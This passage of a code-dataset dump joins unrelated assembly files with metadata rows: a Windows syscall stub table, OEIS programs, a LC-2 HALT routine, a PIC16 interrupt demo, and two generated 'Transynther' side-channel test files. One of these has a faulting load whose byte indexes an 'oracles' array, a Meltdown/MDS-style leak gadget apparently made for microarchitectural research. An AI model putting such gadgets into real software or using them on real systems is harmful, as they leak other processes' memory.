SYSSTUBS_ENTRY2 281, SystemDebugControl, 2
SYSSTUBS_ENTRY3 281, SystemDebugControl, 2
SYSSTUBS_ENTRY4 281, SystemDebugControl, 2
SYSSTUBS_ENTRY5 281, SystemDebugControl, 2
SYSSTUBS_ENTRY6 281, SystemDebugControl, 2
SYSSTUBS_ENTRY7 281, SystemDebugControl, 2
SYSSTUBS_ENTRY8 281, SystemDebugControl, 2
SYSSTUBS_ENTRY1 282, TerminateJobObject, 0
SYSSTUBS_ENTRY2 282, TerminateJobObject, 0
SYSSTUBS_ENTRY3 282, TerminateJobObject, 0
SYSSTUBS_ENTRY4 282, TerminateJobObject, 0
SYSSTUBS_ENTRY5 282, TerminateJobObject, 0
SYSSTUBS_ENTRY6 282, TerminateJobObject, 0
SYSSTUBS_ENTRY7 282, TerminateJobObject, 0
SYSSTUBS_ENTRY8 282, TerminateJobObject, 0
SYSSTUBS_ENTRY1 283, TestAlert, 0
SYSSTUBS_ENTRY2 283, TestAlert, 0
SYSSTUBS_ENTRY3 283, TestAlert, 0
SYSSTUBS_ENTRY4 283, TestAlert, 0
SYSSTUBS_ENTRY5 283, TestAlert, 0
SYSSTUBS_ENTRY6 283, TestAlert, 0
SYSSTUBS_ENTRY7 283, TestAlert, 0
SYSSTUBS_ENTRY8 283, TestAlert, 0
SYSSTUBS_ENTRY1 284, TranslateFilePath, 0
SYSSTUBS_ENTRY2 284, TranslateFilePath, 0
SYSSTUBS_ENTRY3 284, TranslateFilePath, 0
SYSSTUBS_ENTRY4 284, TranslateFilePath, 0
SYSSTUBS_ENTRY5 284, TranslateFilePath, 0
SYSSTUBS_ENTRY6 284, TranslateFilePath, 0
SYSSTUBS_ENTRY7 284, TranslateFilePath, 0
SYSSTUBS_ENTRY8 284, TranslateFilePath, 0
SYSSTUBS_ENTRY1 285, UnloadDriver, 0
SYSSTUBS_ENTRY2 285, UnloadDriver, 0
SYSSTUBS_ENTRY3 285, UnloadDriver, 0
SYSSTUBS_ENTRY4 285, UnloadDriver, 0
SYSSTUBS_ENTRY5 285, UnloadDriver, 0
SYSSTUBS_ENTRY6 285, UnloadDriver, 0
SYSSTUBS_ENTRY7 285, UnloadDriver, 0
SYSSTUBS_ENTRY8 285, UnloadDriver, 0
SYSSTUBS_ENTRY1 286, UnloadKey, 0
SYSSTUBS_ENTRY2 286, UnloadKey, 0
SYSSTUBS_ENTRY3 286, UnloadKey, 0
SYSSTUBS_ENTRY4 286, UnloadKey, 0
SYSSTUBS_ENTRY5 286, UnloadKey, 0
SYSSTUBS_ENTRY6 286, UnloadKey, 0
SYSSTUBS_ENTRY7 286, UnloadKey, 0
SYSSTUBS_ENTRY8 286, UnloadKey, 0
SYSSTUBS_ENTRY1 287, UnloadKey2, 0
SYSSTUBS_ENTRY2 287, UnloadKey2, 0
SYSSTUBS_ENTRY3 287, UnloadKey2, 0
SYSSTUBS_ENTRY4 287, UnloadKey2, 0
SYSSTUBS_ENTRY5 287, UnloadKey2, 0
SYSSTUBS_ENTRY6 287, UnloadKey2, 0
SYSSTUBS_ENTRY7 287, UnloadKey2, 0
SYSSTUBS_ENTRY8 287, UnloadKey2, 0
SYSSTUBS_ENTRY1 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY2 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY3 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY4 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY5 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY6 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY7 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY8 288, UnloadKeyEx, 0
SYSSTUBS_ENTRY1 289, UnlockFile, 1
SYSSTUBS_ENTRY2 289, UnlockFile, 1
SYSSTUBS_ENTRY3 289, UnlockFile, 1
SYSSTUBS_ENTRY4 289, UnlockFile, 1
SYSSTUBS_ENTRY5 289, UnlockFile, 1
SYSSTUBS_ENTRY6 289, UnlockFile, 1
SYSSTUBS_ENTRY7 289, UnlockFile, 1
SYSSTUBS_ENTRY8 289, UnlockFile, 1
SYSSTUBS_ENTRY1 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY2 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY3 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY4 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY5 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY6 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY7 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY8 290, UnlockVirtualMemory, 0
SYSSTUBS_ENTRY1 291, VdmControl, 0
SYSSTUBS_ENTRY2 291, VdmControl, 0
SYSSTUBS_ENTRY3 291, VdmControl, 0
SYSSTUBS_ENTRY4 291, VdmControl, 0
SYSSTUBS_ENTRY5 291, VdmControl, 0
SYSSTUBS_ENTRY6 291, VdmControl, 0
SYSSTUBS_ENTRY7 291, VdmControl, 0
SYSSTUBS_ENTRY8 291, VdmControl, 0
SYSSTUBS_ENTRY1 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY2 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY3 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY4 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY5 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY6 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY7 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY8 292, WaitForDebugEvent, 0
SYSSTUBS_ENTRY1 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY2 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY3 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY4 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY5 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY6 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY7 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY8 293, WaitForKeyedEvent, 0
SYSSTUBS_ENTRY1 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY2 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY3 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY4 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY5 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY6 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY7 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY8 294, WaitHighEventPair, 0
SYSSTUBS_ENTRY1 295, WaitLowEventPair, 0
SYSSTUBS_ENTRY2 295, WaitLowEventPair, 0
SYSSTUBS_ENTRY3 295, WaitLowEventPair, 0
SYSSTUBS_ENTRY4 295, WaitLowEventPair, 0
SYSSTUBS_ENTRY5 295, WaitLowEventPair, 0
SYSSTUBS_ENTRY6 295, WaitLowEventPair, 0
SYSSTUBS_ENTRY7 295, WaitLowEventPair, 0
SYSSTUBS_ENTRY8 295, WaitLowEventPair, 0
STUBS_END
| 42.881309
| 135
| 0.789116
|
49b9f2a8f53a638d19ccdbd2e601736b76cf5d79
| 411
|
asm
|
Assembly
|
trysem/out.asm
|
eruffaldi/cmm
|
ba2942a89231d85141b8d226331e0940492ec661
|
[
"Apache-2.0"
] | null | null | null |
trysem/out.asm
|
eruffaldi/cmm
|
ba2942a89231d85141b8d226331e0940492ec661
|
[
"Apache-2.0"
] | null | null | null |
trysem/out.asm
|
eruffaldi/cmm
|
ba2942a89231d85141b8d226331e0940492ec661
|
[
"Apache-2.0"
] | null | null | null |
.386P
if @Version gt 510
.model FLAT
else
_TEXT SEGMENT PARA USE32 PUBLIC 'CODE'
_TEXT ENDS
_DATA SEGMENT DWORD USE32 PUBLIC 'DATA'
_DATA ENDS
CONST SEGMENT DWORD USE32 PUBLIC 'CONST'
CONST ENDS
_BSS SEGMENT DWORD USE32 PUBLIC 'BSS'
_BSS ENDS
_TLS SEGMENT DWORD USE32 PUBLIC 'TLS'
_TLS ENDS
FLAT GROUP _DATA, CONST, _BSS
ASSUME CS: FLAT, DS: FLAT, SS: FLAT
endif
_TEXT SEGMENT
_TEXT ENDS
END
| 20.55
| 41
| 0.744526
|
5bab6d3f4c4b41f668f1b2f04d046b33e562509e
| 6,865
|
asm
|
Assembly
|
Transynther/x86/_processed/NC/_ht_st_zr_un_/i7-7700_9_0x48.log_21829_1844.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/NC/_ht_st_zr_un_/i7-7700_9_0x48.log_21829_1844.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/NC/_ht_st_zr_un_/i7-7700_9_0x48.log_21829_1844.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r9
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x512e, %rsi
lea addresses_UC_ht+0xc36e, %rdi
nop
nop
nop
nop
cmp %rdx, %rdx
mov $46, %rcx
rep movsq
dec %r9
lea addresses_normal_ht+0x1e36e, %r10
sub $54092, %rbp
mov $0x6162636465666768, %rcx
movq %rcx, (%r10)
nop
xor %r9, %r9
lea addresses_D_ht+0x422e, %rsi
nop
nop
xor %rdi, %rdi
mov $0x6162636465666768, %r9
movq %r9, %xmm5
movups %xmm5, (%rsi)
xor $25165, %rcx
lea addresses_WT_ht+0x11a6e, %rdx
nop
nop
nop
nop
nop
cmp %rbp, %rbp
movb (%rdx), %r9b
nop
nop
nop
nop
add $22999, %rdx
lea addresses_WT_ht+0x332, %rcx
nop
nop
cmp $27110, %r9
movb $0x61, (%rcx)
nop
nop
nop
nop
xor %r9, %r9
lea addresses_WC_ht+0xde10, %r9
and $22962, %rbp
mov $0x6162636465666768, %rdx
movq %rdx, %xmm1
vmovups %ymm1, (%r9)
nop
xor %rdx, %rdx
lea addresses_D_ht+0xc182, %rdx
nop
nop
nop
nop
nop
add %rbp, %rbp
mov $0x6162636465666768, %rsi
movq %rsi, %xmm5
movups %xmm5, (%rdx)
nop
nop
add %rcx, %rcx
lea addresses_WC_ht+0x1694e, %r10
xor %rdx, %rdx
movups (%r10), %xmm7
vpextrq $1, %xmm7, %rdi
cmp %r10, %r10
lea addresses_WC_ht+0x5b6e, %r10
clflush (%r10)
nop
nop
nop
sub $36210, %rsi
movb $0x61, (%r10)
nop
nop
nop
and %rcx, %rcx
lea addresses_WC_ht+0x48f4, %rdx
nop
nop
dec %rsi
movb (%rdx), %r10b
nop
nop
nop
nop
nop
sub %rdi, %rdi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %r9
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r12
push %r9
push %rbp
push %rbx
// Faulty Load
mov $0x21d776000000062e, %r9
nop
nop
nop
nop
add $57522, %rbp
vmovups (%r9), %ymm6
vextracti128 $1, %ymm6, %xmm6
vpextrq $0, %xmm6, %r10
lea oracles, %rbx
and $0xff, %r10
shlq $12, %r10
mov (%rbx,%r10,1), %r10
pop %rbx
pop %rbp
pop %r9
pop %r12
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 32, 'same': False, 'NT': True}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 32, 'same': True, 'NT': False}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 7, 'same': True}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'AVXalign': False, 'congruent': 6, 'size': 8, 'same': True, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'AVXalign': False, 'congruent': 9, 'size': 16, 'same': False, 'NT': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'AVXalign': False, 'congruent': 5, 'size': 1, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'congruent': 1, 'size': 1, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 1, 'size': 32, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'AVXalign': False, 'congruent': 1, 'size': 16, 'same': False, 'NT': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 1, 'size': 16, 'same': True, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 4, 'size': 1, 'same': False, 'NT': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WC_ht', 'AVXalign': True, 'congruent': 1, 'size': 1, 'same': False, 'NT': False}}
{'2d': 3, '4c': 1, 'ce': 3, '3a': 1, 'a0': 2, '92': 3, 'd9': 6, 'd5': 2, '72': 3, '86': 1, '36': 2, '40': 3, '6b': 2, 'b4': 1, 'd1': 2, '89': 2, '30': 2, '51': 55, '02': 4, '66': 2, '7d': 3, '87': 1, 'eb': 1, '1e': 2, '04': 2, 'e7': 2, '0f': 1, 'ee': 1, '71': 3, '23': 2, '43': 6, '95': 3, 'f5': 1, '1a': 1, '29': 1, '50': 77, '00': 21579, 'b1': 1, 'b8': 1, 'cd': 4, '56': 4, '42': 3, '2e': 2, '0d': 2, 'cb': 2, 'c0': 1, 'fe': 2, 'f7': 4, '9f': 4, '69': 4, '5e': 3, '1b': 4, 'c3': 1, 'aa': 1}
00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d1 00 00 00 00 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 95 00 00 00 00 00 00 00 00 00 00 00 00 00 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 42.376543
| 2,999
| 0.63394
|
64e8173a088668cac02d0f6579455abecd6a66fb
| 719
|
asm
|
Assembly
|
oeis/055/A055259.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/055/A055259.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/055/A055259.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A055259: Sums of two powers of 8.
; Submitted by Jon Maiga
; 2,9,16,65,72,128,513,520,576,1024,4097,4104,4160,4608,8192,32769,32776,32832,33280,36864,65536,262145,262152,262208,262656,266240,294912,524288,2097153,2097160,2097216,2097664,2101248,2129920,2359296,4194304,16777217,16777224,16777280,16777728,16781312,16809984,17039360,18874368,33554432,134217729,134217736,134217792,134218240,134221824,134250496,134479872,136314880,150994944,268435456,1073741825,1073741832,1073741888,1073742336,1073745920,1073774592,1074003968,1075838976,1090519040,1207959552
seq $0,131437 ; (A000012 * A131436) + (A131436 * A000012) - A000012.
seq $0,32929 ; Numbers whose set of base-8 digits is {1,2}.
mul $0,7
add $0,2
div $0,8
| 71.9
| 500
| 0.805285
|
fc91da17661f59b8f9ab7a814a09ed9748b5758d
| 929
|
asm
|
Assembly
|
asm/halt.asm
|
spratt/lc2.js
|
c1c628db927982888f5882a38c4345bbe7e7a568
|
[
"0BSD"
] | 1
|
2017-01-24T14:03:43.000Z
|
2017-01-24T14:03:43.000Z
|
asm/halt.asm
|
spratt/lc2.js
|
c1c628db927982888f5882a38c4345bbe7e7a568
|
[
"0BSD"
] | 1
|
2016-12-28T01:44:23.000Z
|
2016-12-28T02:51:52.000Z
|
asm/halt.asm
|
spratt/lc2.js
|
c1c628db927982888f5882a38c4345bbe7e7a568
|
[
"0BSD"
] | null | null | null |
;;; halt.asm
;;; HALT service routine (system call)
;;; adapted from Figure 9.6, Patt & Patel
.orig 0xfd70
st r7, SaveR7 ; Save linkage back to program
st r0, SaveR0
st r1, SaveR1
;;; Print message that the machine is halting
ld r0, nl
out
lea r0, msg
puts
ld r0, nl
out
;;; clear bit at $FFFF to stop the machine
ldi r1, MCR
ld r0, MASK
and r0, r1, r0 ; clear top bit
sti r0, MCR
;;; return from HALT routine
;;; Should never happen.
ld r0, SaveR0
ld r1, SaveR1
ld r7, SaveR7
ret
nl: .fill 0x000a ; ASCII newline
SaveR0: .fill 0x0000
SaveR1: .fill 0x0000
SaveR7: .fill 0x0000
msg: .stringz "Halting the machine."
MCR: .fill 0xffff
MASK: .fill 0x7fff
.end
| 22.119048
| 62
| 0.501615
|
5137ba0568301fa6239e84aae6911a275a1ddf9a
| 1,298
|
asm
|
Assembly
|
TrabajoIntegrado/Prueba/prueba.asm
|
nicopassaglia/Simon_digitales
|
3b1df2fbc7ba49d69eaabaae9d0cb8217f1ca355
|
[
"MIT"
] | null | null | null |
TrabajoIntegrado/Prueba/prueba.asm
|
nicopassaglia/Simon_digitales
|
3b1df2fbc7ba49d69eaabaae9d0cb8217f1ca355
|
[
"MIT"
] | null | null | null |
TrabajoIntegrado/Prueba/prueba.asm
|
nicopassaglia/Simon_digitales
|
3b1df2fbc7ba49d69eaabaae9d0cb8217f1ca355
|
[
"MIT"
] | null | null | null |
list p = 16f887
include "p16f887.inc"
__CONFIG _CONFIG1, _LVP_OFF & _FCMEN_ON & _IESO_OFF & _BOR_OFF & _CPD_OFF & _CP_OFF & _MCLRE_OFF & _PWRTE_OFF & _WDT_OFF & _XT_OSC
__CONFIG _CONFIG2, _WRT_OFF & _BOR21V
;__CONFIG _XT_OSC & _PWRTE_OFF & _BOREN_OFF & _CP_OFF & _WDT_OFF & _DP_OFF & _CPC_OFF
cblock 0x30
DELAY1
DELAY2
endc
org 0x00
goto INICIO
org 0x04
goto INT
INT
ANTIREBOTE_INT
call delay_100ms
PROBANDO_RB0
btfsc PORTB, 0 ;Testeo el bit RB0, si se dejo de pulsar el boton bajara a cero
goto PROBANDO_RB0
call delay_100ms ;Una vez que se dejo de presionar el boton, hago un delay de 10 ms para que pase el rebote.
banksel INTCON
movlw b'00000010'
xorwf PORTA, 1
bcf INTCON, INTF
retfie
INICIO
;banksel OSCCON
;movlw b'10101100'
;movwf OSCCON
banksel TRISA
bsf TRISB, 0
bcf TRISA, 1
banksel ANSEL
clrf ANSEL
clrf ANSELH
banksel OPTION_REG
movlw b'11000000'
movwf OPTION_REG
banksel INTCON
bsf INTCON, GIE
bsf INTCON, INTE
bcf PORTA, 1
nop
nop
HOLA
nop
clrwdt
goto HOLA
delay_100ms
;{
movlw .200
movwf DELAY2
BUCLE2_100
movlw .124
movwf DELAY1
BUCLE1_100
clrwdt
decfsz DELAY1, 1
goto BUCLE1_100
decfsz DELAY2, 1
goto BUCLE2_100
return ;La formula del delay es R=[(4X)+4]Y+1 donde X=124 e Y=20.
;}
end
| 17.306667
| 133
| 0.725732
|
16b860428524d53252a06c18585e1786156107dc
| 1,206
|
asm
|
Assembly
|
programs/oeis/085/A085351.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/085/A085351.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/085/A085351.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A085351: Expansion of (1-3*x)/((1-4*x)*(1-5*x)).
; 1,6,34,186,994,5226,27154,139866,715714,3644106,18482674,93461946,471504034,2374297386,11938595794,59961414426,300880813954,1508699037066,7560675054514,37872094749306,189635351653474,949276269895146,4750779395986834,23771489165978586,118927814574070594,594920547847063626,2975728639142160754,14883146795338174266,74433748375200353314,372240799470039694506,1861492227726350184274,9308614060136357768346,46547681986700216229634,232756856677574790699786,1163858070364168791705394,5819585499726023311352826,29099108090250833968067554,145500262817737039485551466,727520203554616676008612114,3637676575636809294366479706,18188685109638950129126075074,90944634474014365274805081546,454728008073350284890724232434,2273659383179865258520416460986,11368374287151781628869263500194,56842180920768729489415042282026,284212142543882932827350110534354,1421065664479571805657850149168666,7105348129438487594373649131830914,35526819875354952236205839203104906,177634416289424818238379570191325874,888173349097724319421299347659834746
mov $1,5
pow $1,$0
mul $1,4
mov $2,$0
mov $3,$0
add $3,$0
add $0,3
sub $2,$0
add $2,1
pow $2,$3
mul $2,2
sub $1,$2
div $1,2
mov $0,$1
| 67
| 1,019
| 0.881426
|
91748706f884ead9454f4ed4513eb59737ce545f
| 377
|
asm
|
Assembly
|
scripts/CeladonMart5F.asm
|
opiter09/ASM-Machina
|
75d8e457b3e82cc7a99b8e70ada643ab02863ada
|
[
"CC0-1.0"
] | 1
|
2022-02-15T00:19:44.000Z
|
2022-02-15T00:19:44.000Z
|
scripts/CeladonMart5F.asm
|
opiter09/ASM-Machina
|
75d8e457b3e82cc7a99b8e70ada643ab02863ada
|
[
"CC0-1.0"
] | null | null | null |
scripts/CeladonMart5F.asm
|
opiter09/ASM-Machina
|
75d8e457b3e82cc7a99b8e70ada643ab02863ada
|
[
"CC0-1.0"
] | null | null | null |
CeladonMart5F_Script:
jp EnableAutoTextBoxDrawing
CeladonMart5F_TextPointers:
dw CeladonMart5Text1
dw CeladonMart5Text2
dw CeladonMart5Clerk1Text
dw CeladonMart5Clerk2Text
dw CeladonMart5Text5
CeladonMart5Text1:
text_far _CeladonMart5Text1
text_end
CeladonMart5Text2:
text_far _CeladonMart5Text2
text_end
CeladonMart5Text5:
text_far _CeladonMart5Text5
text_end
| 17.136364
| 28
| 0.875332
|
65939c70706350e3f4361a42a5b057e2e5a4f2c2
| 271
|
asm
|
Assembly
|
int 10/Teletype/smile/smile.asm
|
LiquidFox1776/Keeping-it-Real
|
6c79f18635024800b647a53893f44eb1e91284d9
|
[
"MIT"
] | 1
|
2019-01-01T17:08:56.000Z
|
2019-01-01T17:08:56.000Z
|
int 10/Teletype/smile/smile.asm
|
LiquidFox1776/Keeping-it-Real
|
6c79f18635024800b647a53893f44eb1e91284d9
|
[
"MIT"
] | null | null | null |
int 10/Teletype/smile/smile.asm
|
LiquidFox1776/Keeping-it-Real
|
6c79f18635024800b647a53893f44eb1e91284d9
|
[
"MIT"
] | null | null | null |
org 7c00h ; ORIGIN ADDRESS
MOV AH,0Eh ; 0E TELETYPE MODE
MOV AL,1 ; CHARACTER TO WRITE, ASCII CHARACTER 1 IS THE HAPPY FACE
INT 10h ; CALL THE INTERRUPT FOR VIDEO SERVICES
TIMES 510-($-$$) DB 0 ; PAD UNTIL 510TH BYTE
DW 0xAA55 ; BOOT SIGNATURE
TIMES 1474560-($-$$) DB 0
| 30.111111
| 66
| 0.723247
|
b91fd96f79fd7b66b48b04d09614d762fb3a3778
| 8,362
|
asm
|
Assembly
|
Transynther/x86/_processed/NONE/_ht_zr_un_/i9-9900K_12_0xa0.log_21829_1149.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/NONE/_ht_zr_un_/i9-9900K_12_0xa0.log_21829_1149.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/NONE/_ht_zr_un_/i9-9900K_12_0xa0.log_21829_1149.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r14
push %r8
push %r9
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x109, %rbx
xor %rdx, %rdx
mov (%rbx), %r14
nop
nop
xor $13669, %r10
lea addresses_WC_ht+0xb79f, %r8
nop
and %r9, %r9
mov (%r8), %r14d
nop
nop
nop
nop
nop
sub $57401, %r9
lea addresses_WT_ht+0x16109, %r14
nop
nop
xor %rdx, %rdx
vmovups (%r14), %ymm1
vextracti128 $0, %ymm1, %xmm1
vpextrq $0, %xmm1, %r9
nop
nop
sub %r14, %r14
lea addresses_UC_ht+0x18e45, %r8
clflush (%r8)
nop
nop
nop
nop
nop
add %rcx, %rcx
vmovups (%r8), %ymm7
vextracti128 $0, %ymm7, %xmm7
vpextrq $1, %xmm7, %r10
nop
nop
nop
add $49946, %rdx
lea addresses_UC_ht+0x9f09, %rdx
clflush (%rdx)
nop
nop
nop
xor $29291, %rcx
movb (%rdx), %r8b
nop
nop
cmp %r14, %r14
lea addresses_A_ht+0x14509, %rcx
nop
nop
nop
nop
add %r14, %r14
mov $0x6162636465666768, %rdx
movq %rdx, %xmm2
